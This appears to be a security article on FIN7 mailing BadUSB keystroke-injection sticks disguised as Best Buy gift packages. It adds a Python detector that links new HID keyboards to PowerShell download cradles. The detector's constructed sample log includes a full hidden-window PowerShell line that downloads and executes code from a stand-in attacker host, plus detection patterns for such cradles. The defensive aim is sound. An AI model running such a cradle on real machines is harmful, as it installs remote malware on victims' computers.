The FBI recently issued a warning to businesses about a new ploy being used by the FIN7 gang (also known as the Navigator Group and the Carbanak Group). More than $1 billion in fraud has already been tied to the gang, most of it taken through FIN7’s typical attack: infecting point-of-sale systems with malware and using it to steal card details at the moment of payment.

BadUSB attacks

Recently however, the group has been deploying a new attack: The victim receives a package in the post containing a teddy bear, what appears to be a $50 gift card to Best Buy and a USB memory stick. A covering letter is also included in the package and reads ‘Best Buy company thanks you for being our regular customer for a long period of time, so we would like to send you a gift card to the amount of $50. You can spend it on any product from the list of items presented on the USB stick’. The attacker just needs the USB stick to be plugged into the victim’s computer.

The USB device sent inside the package is a tool known as a ‘BadUSB’ or ‘Bad Beetle USB device’ and is commercially available. Attacks of this kind are sometimes also referred to as ‘Bash Bunny’ attacks, after one well-known commercial keystroke-injection device, the Hak5 Bash Bunny. Such devices are most commonly used by penetration testers, and attacks with them have been described as a ‘relatively rare’ form of attack. However, last year there was a suspected attempted attack using a BadUSB at the Trump-owned Mar-a-Lago resort.

What makes a BadUSB dangerous is that it does not present itself as storage at all. Its firmware has been rewritten so that, when the victim plugs it in, the device registers as an input device, specifically a USB HID keyboard. The operating system trusts keyboards, and there is no file for antivirus software to scan, so the device can simply type: it sends a series of keystrokes to the target computer that ultimately run a PowerShell command, which downloads and then executes a malware payload from a server controlled by the attacker. Everything it types runs with the privileges of whoever is logged in, and the payload gives the attacker remote access to the machine. Reportedly, the current FIN7 attack then calls out to domains and IP addresses located in Russia.
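The chain described above leaves two observable traces on the host: a new HID keyboard is enumerated, and seconds later PowerShell starts with a download-and-execute cradle on its command line. The following detector, added here as an example and not code from the article, the FBI or FIN7's tooling, correlates the two. The log format, device identifiers, cradle patterns and 60-second window are all assumptions made for the example, and the sample events are constructed.

```python
"""
Added example: correlate a new HID keyboard with a PowerShell download cradle.
Log format, identifiers, patterns and the time window are assumptions for this
example; the sample telemetry below is constructed, not real FIN7 data.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional

# Assumption: a PowerShell launch this soon after a new keyboard is suspicious.
CORRELATION_WINDOW = timedelta(seconds=60)

# Fragments a keystroke-injection payload typically types to fetch and run stage two.
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\bIEX\b", r"Invoke-Expression", r"DownloadString", r"DownloadFile",
    r"Invoke-WebRequest", r"Start-BitsTransfer", r"FromBase64String",
    r"(?<!\S)-e(nc(odedcommand)?)?\b", r"-w(indowstyle)?\s+hidden",
)]

# Constructed sample telemetry in an invented format:
#   <ISO timestamp> DEVICE_ARRIVAL <device id> <class> "<friendly name>"
#   <ISO timestamp> PROCESS_CREATE <parent> -> <image> "<command line>"
SAMPLE_LOG = r"""
2020-03-26T09:12:01 DEVICE_ARRIVAL HID\VID_AAAA&PID_0001 Keyboard "USB Keyboard (user's own)"
2020-03-26T09:41:10 DEVICE_ARRIVAL HID\VID_BBBB&PID_0002 Keyboard "USB Keyboard"
2020-03-26T09:41:14 PROCESS_CREATE explorer.exe -> powershell.exe "powershell -w hidden -nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://attacker.invalid/p')"
2020-03-26T10:05:00 PROCESS_CREATE explorer.exe -> powershell.exe "powershell -c Get-ChildItem C:\Users"
2020-03-26T11:00:00 DEVICE_ARRIVAL USBSTOR\Disk&Ven_Generic Disk "Generic Mass Storage"
2020-03-26T15:30:00 PROCESS_CREATE cmd.exe -> powershell.exe "powershell -enc SQBFAFgA"
"""

LINE_RE = re.compile(r"^(\S+)\s+(DEVICE_ARRIVAL|PROCESS_CREATE)\s+(.*)$")
PROC_RE = re.compile(r'^(\S+)\s+->\s+(\S+)\s+"(.*)"$')


@dataclass
class Event:
    ts: datetime
    kind: str
    detail: str


@dataclass
class Alert:
    ts: datetime
    severity: str
    reason: str


def parse_log(text: str) -> List[Event]:
    """Parse the constructed log format; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(Event(datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)))
    return sorted(events, key=lambda e: e.ts)


def is_keyboard_arrival(e: Event) -> bool:
    parts = e.detail.split()
    return e.kind == "DEVICE_ARRIVAL" and len(parts) > 1 and parts[1].lower() == "keyboard"


def powershell_cmdline(e: Event) -> Optional[str]:
    """Return the command line if the event is a PowerShell process creation."""
    m = PROC_RE.match(e.detail) if e.kind == "PROCESS_CREATE" else None
    if m and m.group(2).lower() in ("powershell.exe", "pwsh.exe"):
        return m.group(3)
    return None


def cradle_hits(cmdline: str) -> List[str]:
    """Patterns from CRADLE_PATTERNS that appear in the command line."""
    return [p.pattern for p in CRADLE_PATTERNS if p.search(cmdline)]


def detect(events: List[Event], window: timedelta = CORRELATION_WINDOW) -> List[Alert]:
    alerts: List[Alert] = []
    keyboard_arrivals: List[datetime] = []
    for e in events:
        if is_keyboard_arrival(e):
            if keyboard_arrivals:
                # A machine rarely gains a second keyboard; note it even without a payload.
                alerts.append(Alert(e.ts, "low", "additional HID keyboard enumerated: " + e.detail))
            keyboard_arrivals.append(e.ts)
            continue
        cmd = powershell_cmdline(e)
        if cmd is None:
            continue
        hits = cradle_hits(cmd)
        if not hits:
            continue
        # High severity only when the cradle follows a keyboard arrival inside the window.
        typed_in = any(timedelta(0) <= e.ts - kb <= window for kb in keyboard_arrivals)
        severity = "high" if typed_in else "medium"
        suffix = " within %ds of a new keyboard" % window.total_seconds() if typed_in else ""
        alerts.append(Alert(e.ts, severity, "PowerShell download cradle (%s)%s" % (", ".join(hits), suffix)))
    return alerts


def run_sample() -> List[Alert]:
    return detect(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for a in run_sample():
        print(a.ts.isoformat(), a.severity.upper(), a.reason)
```

On the constructed sample this raises a low-severity alert for the second keyboard, a high-severity alert for the cradle typed four seconds after it, nothing for the benign PowerShell launch, and a medium-severity alert for the encoded command later in the day that has no nearby keyboard event. In a real deployment the two event streams would come from device-installation and process-creation telemetry, and the patterns would need tuning against the estate's own administrative scripts.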

This recent warning from the FBI should be a reminder to continue following best practices, in this instance never to plug an unknown USB device into your computer. Because a BadUSB presents itself as a keyboard rather than as a storage device, blocking USB mass storage alone does not stop it; organisations that want a technical control need to restrict or alert on newly enumerated keyboards as well.